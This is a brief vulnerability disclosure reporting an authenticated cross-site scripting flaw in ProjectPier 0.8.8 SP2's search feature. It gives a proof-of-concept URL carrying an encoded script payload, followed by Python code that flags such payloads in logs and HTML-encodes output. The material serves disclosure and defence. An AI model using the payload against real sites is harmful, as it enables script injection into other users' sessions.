ProjectPier version 0.8.8 SP2 suffers from a cross site scripting vulnerability.
8405f0debc4bd59bdf121d4d4769a460a5529cb51ef81d22175d4907a68b8d03
I was doing my RASP (Runtime Application Self-Protection) module testing on
the latest version of Project Pier i.e. 0.8.8 SP2 yesterday and found an
XSS vulnerability in search.
http://<server>/public/index.php?c=project&a=search&1427642606&active_project=1&search_for=%3CScRiPt%3Eprompt%28%22This%20website%20has%20simple%20exploitable%20XSS.%22%29%3C%2FScRiPt%3E
The XSS occurs after authentication.
Thanks,
Jaydeep Dave
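
A defensive check for the request shown above, as an added example that is not part of the original post or of ProjectPier's code: it URL-decodes the `search_for` parameter from logged request targets, flags values containing tag-like markup regardless of letter case, and shows the HTML-encoded form a results page should echo instead. The sample log entries are constructed and the function names are hypothetical.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request targets as they would appear in a web access log.
SAMPLE_REQUESTS = [
    "/public/index.php?c=project&a=search&active_project=1&search_for=milestone+report",
    "/public/index.php?c=project&a=search&1427642606&active_project=1"
    "&search_for=%3CScRiPt%3Eprompt%28%22This%20website%20has%20simple"
    "%20exploitable%20XSS.%22%29%3C%2FScRiPt%3E",
]

# Tag-like sequence: '<' followed by a letter, '/' plus a letter, or '!'.
# IGNORECASE matters: the reported request uses mixed case ("ScRiPt"),
# which a case-sensitive match on "<script" would miss.
MARKUP = re.compile(r"<(?:/?[a-z]|!)", re.IGNORECASE)


def search_terms(target):
    """Return the URL-decoded search_for values of one request target."""
    query = urlsplit(target).query
    return parse_qs(query, keep_blank_values=True).get("search_for", [])


def flag_requests(targets):
    """Return (target, decoded value) pairs whose search term contains markup."""
    hits = []
    for target in targets:
        for value in search_terms(target):
            if MARKUP.search(value):
                hits.append((target, value))
    return hits


def render_safe(value):
    """HTML-encode a search term before echoing it into the results page."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for target, value in flag_requests(SAMPLE_REQUESTS):
        print("flagged:", value)
        print("encoded:", render_safe(value))
```

Matching on the decoded value rather than the raw log line is what catches the percent-encoded form; the encoding step is the actual fix, and the log check only helps find requests that exercised the flaw.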